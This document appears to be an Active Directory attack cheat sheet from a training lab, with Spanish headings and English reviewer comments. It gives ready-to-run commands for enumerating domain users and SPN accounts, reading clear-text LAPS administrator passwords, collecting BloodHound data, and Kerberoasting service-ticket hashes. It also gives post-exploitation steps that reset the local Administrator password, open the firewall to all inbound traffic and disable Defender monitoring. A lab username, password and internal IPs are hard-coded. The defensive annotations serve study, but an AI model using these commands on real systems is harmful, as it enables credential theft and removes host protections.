Enumeración Local

# Local enumeration of the constraints on the current PowerShell session.
# Prints the session's language mode (e.g. FullLanguage or ConstrainedLanguage);
# the ADSI / .NET one-liners further down rely on FullLanguage.
$ExecutionContext.SessionState.LanguageMode
# Lists the rule collections of the effective AppLocker policy on this host.
# NOTE(review): empty output presumably means no AppLocker policy is applied
# (or the cmdlet is unavailable) — confirm before drawing conclusions.
Get-AppLockerPolicy -Effective | Select-Object -ExpandProperty RuleCollections

Enumeración Remota

ADSI

# Domain enumeration using only ADSI / .NET (no extra modules required).
# All queries run in the current user's security context against the current domain.
# NOTE(review): these attributes are normally readable by any authenticated domain
# user, so no elevated rights are needed — verify against the target's actual ACLs.

# Get current domain: DNS name of the domain of the current security context.
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().Name
# Get domain users: every user object that has a sAMAccountName, shown as a table of
# sAMAccountName / name / mail / description. Multi-valued attributes are joined with ', '.
([ADSISearcher]"(&(objectCategory=person)(objectClass=user)(sAMAccountName=*))").FindAll() | ForEach-Object { [PSCustomObject]@{Usuario = ($_.Properties.sAMAccountName -join ', '); Nombre = ($_.Properties.name -join ', '); Email = ($_.Properties.mail -join ', '); Desc = ($_.Properties.description -join ', ')}} | Format-Table -AutoSize
# Get domain users with an SPN (Kerberoastable accounts).
# The LDAP filter already requires servicePrincipalName=*, so the trailing
# Where-Object {$_.SPN} is redundant (harmless). Defensive view: these are the
# accounts whose passwords must be long and random, or managed (gMSA), because
# any domain user can request a service ticket for them.
([ADSISearcher]"(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))").FindAll() | ForEach-Object { [PSCustomObject]@{Usuario = ($_.Properties['samaccountname'] | Select-Object -First 1); SPN = ($_.Properties['serviceprincipalname'] -join ', ')}} | Where-Object {$_.SPN} | Format-Table -AutoSize
# Get computers: cn / sAMAccountName / operatingSystem / description of every
# computer object. The operatingSystem value is self-reported by the client
# at join time and may be stale.
([ADSISearcher]"(&(objectCategory=computer)(sAMAccountName=*))").FindAll() | ForEach-Object { [PSCustomObject]@{Nombre = ($_.Properties.cn -join ', '); SAM = ($_.Properties.sAMAccountName -join ', '); OS = ($_.Properties.operatingsystem -join ', '); Desc = ($_.Properties.description -join ', ')}} | Format-Table -AutoSize
# Get LAPS passwords (legacy LAPS attribute ms-Mcs-AdmPwd). For each matching
# computer: a blank line (Write-Host, i.e. host output, not the pipeline, so it
# is not captured by redirection), then the cn and the clear-text password.
# NOTE(review): LDAP only matches ms-Mcs-AdmPwd=* on objects where the caller can
# read that attribute, so the result set reflects the caller's LAPS read rights;
# auditing who holds those rights is the mitigation. This one-liner is repeated
# verbatim under the LAPS heading below.
([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=*))").findAll() | ForEach-Object { Write-Host "" ; $_.properties.cn ; $_.properties.'ms-mcs-admpwd'}

BloodHound

# BloodHound collection through NetExec's LDAP module: authenticates with a
# password and runs every collection method ('-c All'). 'IP', 'user', 'password'
# and 'IP_DNS' are placeholders to replace.
# Defensive note: this produces a large burst of LDAP queries from a single
# principal in a short window — a usable detection signal where LDAP query
# logging is enabled.
netexec ldap 'IP' -u 'user' -p 'password' --bloodhound -c All --dns-server 'IP_DNS'

# Cross-domain collection with bloodhound-ce-python (the /etc/hosts entries for
# the target domain must resolve correctly).
# NOTE(review): '[email protected]' is most likely a redaction artifact (the
# original user@domain value was stripped when the page was rendered), not the
# real account name. The password is hard-coded on the command line, so it ends
# up in shell history and is visible to other local users via 'ps'; the same
# applies to the Kerberoasting command further down.
# '-dc' is given the domain name rather than a DC hostname; this presumably only
# works because the domain's A record resolves to a DC — confirm.
bloodhound-ce-python -u [email protected] -p '8_AxEwQaZjOGUb' -c all -d denkiair-prod.com -ns 172.16.180.102 -dc denkiair-prod.com --zip

LAPS

# Reads the legacy LAPS attribute ms-Mcs-AdmPwd: for every computer object on
# which the caller can read it, prints a blank line (via Write-Host, so it is
# not part of the pipeline output), the computer cn and the clear-text local
# administrator password. Identical to the "Get LAPS passwords" one-liner in the
# ADSI section above.
# NOTE(review): the result set is bounded by the caller's read rights on
# ms-Mcs-AdmPwd — the defensive control is auditing those ACLs. Windows LAPS
# stores its password in a different attribute, so this filter does not cover it.
([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=*))").findAll() | ForEach-Object { Write-Host "" ; $_.properties.cn ; $_.properties.'ms-mcs-admpwd'}
# Same LAPS read through NetExec's 'laps' module, authenticating with an NT hash
# ('-H') rather than a password. 'IP', "USER" and 'HASH' are placeholders.
netexec ldap 'IP' -u "USER" -H 'HASH' --module laps

Kerberoasting

# Kerberoasting with NetExec ('nxc' is the short alias). Both forms write the
# collected service-ticket hashes to output.txt in the current directory.
# Using credentials. Note that the domain here is 'denkiair.com' while the
# BloodHound command above targets denkiair-prod.com (the cross-domain setup), and
# that the DNS server (172.16.238.102) differs from the LDAP target (172.16.180.102).
# The password is passed on the command line (shell history / 'ps').
nxc ldap 172.16.180.102 -u 'alex.palmer' -p '8_AxEwQaZjOGUb' -d 'denkiair.com' --dns-server 172.16.238.102 --kerberoasting output.txt
# Using an existing TGT: '-k' selects Kerberos authentication and '--use-kcache'
# takes the ticket from the credential cache (KRB5CCNAME). This needs a krb5.conf
# that resolves the realm — see the "Generar krb5.conf" section below.
nxc ldap 172.16.180.102 -k --use-kcache --kerberoasting output.txt

Generar krb5.conf desde NetExec

# Have NetExec write a krb5.conf for the target domain (discovered over SMB),
# then point the Kerberos libraries at it so later '-k' / '--use-kcache'
# invocations can resolve the realm. 'ip', 'user', 'password' and '/path' are
# placeholders.
netexec smb ip -u user -p password --generate-krb5-file /path
# 'export' only affects the current shell session; re-run it in a new shell.
export KRB5_CONFIG=/path

Post-Exploitation

Disable Restrictions

# Post-exploitation steps that remove host protections. Each one is loud and is
# recorded by default logging:
# Resets the local Administrator password to the literal 'Alumne1234.'. A password
# reset of a privileged account is logged (Security event 4724), and with the
# literal on the command line the new credential also lands in command-line /
# PowerShell logs.
net user Administrator 'Alumne1234.'
# Adds an inbound firewall rule allowing all traffic on every protocol; new rules
# are recorded in the Windows Firewall operational log.
New-NetFirewallRule -DisplayName "AllowAllIn" -Direction Inbound -Action Allow -Protocol Any
# Turns off Defender real-time monitoring. Defender logs the configuration change,
# and tamper protection, where enabled, blocks it.
Set-MpPreference -DisableRealtimeMonitoring $true